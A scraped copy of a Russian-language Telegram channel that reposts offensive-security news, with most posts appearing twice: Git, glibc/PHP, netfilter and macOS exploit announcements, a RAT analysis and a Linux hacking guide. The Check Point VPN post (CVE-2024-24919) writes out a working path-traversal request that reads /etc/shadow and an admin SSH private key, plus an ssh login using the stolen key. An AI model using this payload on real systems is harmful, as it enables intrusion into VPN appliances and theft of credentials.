Channel: Proxy Bar
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-32002 GIT RCE
*
Удаленное выполнение кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit
#git #rce
*
Удаленное выполнение кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit
#git #rce
Поиск, анализ и использование переполнения буфера стека
*
Часть 01
Часть 02
#netfilter #linux
в подсистеме netfilter
из контекста softirq
.*
Часть 01
Часть 02
#netfilter #linux
Трансмутация вредоносного ПО - Раскрытие скрытых следов кровавой алхимии.
*
Интересный writeup.
Рассматривается анализ вредоносного ПО под названием
В октябре 2023 года BloodAlchemy была названа
*
Link
#malware #rat
*
Интересный writeup.
Рассматривается анализ вредоносного ПО под названием
«BloodAlchemy»
, которое наблюдали в ходе атаки.В октябре 2023 года BloodAlchemy была названа
Elastic Security Lab 1
новым RATником. Однако расследование показало, что BloodAlchemy — это НЕ совершенно новая вредоносная программа, а развитая версия Deed RAT
, преемника ShadowPad
.*
Link
#malware #rat
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-2961 - тихоходка
*
Помните месяц назад был кипишь, относительно того что нашли дырку в
Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.
А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.
Ну так вот, на сцену вползает
*
Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961
*
Читаем
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine
*
Помните месяц назад был кипишь, относительно того что нашли дырку в
glibc
. Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.
А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.
Ну так вот, на сцену вползает
Iconv
со своим RCE
.*
Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961
*
Читаем
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine
CVE-2024-27842 + CVE-2023-40404 macOS
*
Сплоит позволяет выполнять код на уровне ядра
*
POC exploit (для CVE-2024-27842)
POC exploit (для CVE-2023-40404)
#macos
*
Сплоит позволяет выполнять код на уровне ядра
*
POC exploit (для CVE-2024-27842)
POC exploit (для CVE-2023-40404)
#macos
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
#0day #checkpoint
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#0day #checkpoint
CVE-2024-24919 Check Point Remote Access VPN 0-Day
Ну или так 👌
*
#shitPointVPN #0Day
Ну или так 👌
aCSHELL/../../../../../../../
home/admin/.ssh/id_rsa
*
ssh admin@Хостъ -i id_rsa
#shitPointVPN #0Day
Доброй ночи.
Написал небольшуюкнижку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
Написал небольшую
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
HTML Embed Code: